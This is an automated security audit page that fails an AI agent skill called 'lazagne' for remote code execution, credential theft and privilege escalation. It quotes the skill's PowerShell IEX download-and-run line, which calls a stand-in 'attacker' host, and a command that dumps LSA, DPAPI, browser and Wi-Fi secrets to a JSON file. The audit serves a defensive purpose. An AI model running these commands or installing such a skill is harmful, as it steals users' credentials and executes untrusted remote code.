skills/aeondave/malskill/lazagne/Gen Agent Trust Hub

lazagne

Fail

Audited by Gen Agent Trust Hub on Sep 15, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCOMMAND_EXECUTIONDYNAMIC_EXECUTIONPRIVILEGE_ESCALATION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides a specific command workflow using PowerShell's IEX (Invoke-Expression) to download and execute code from an external, untrusted source (http://attacker/LaZagne.py). This allows for arbitrary code execution directly in memory, bypassing disk-based detection.
  • [DATA_EXFILTRATION]: The skill is designed to automate the discovery and extraction of sensitive information, including browser history/passwords, Windows LSA secrets, DPAPI credentials, Wi-Fi keys, and Git credentials. It explicitly provides commands to dump all recovered secrets into a JSON file (-oJ C:\Windows\Temp\creds.json).
  • [COMMAND_EXECUTION]: The instructions direct the agent to execute a binary (lazagne.exe) with various flags that perform automated system-wide searches for sensitive data.
  • [DYNAMIC_EXECUTION]: The use of IEX(New-Object Net.WebClient).DownloadString(...) represents unsafe dynamic execution of remotely fetched code, a common technique for executing malicious payloads.
  • [PRIVILEGE_ESCALATION]: The skill targets sensitive system components such as LSA secrets, Windows Vault, and DPAPI, which typically require administrative privileges to access. The documentation explicitly mentions operating within an "admin context" to increase artifact visibility.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Sep 15, 2026, 09:56 AM
Security Audit — agent-trust-hub — lazagne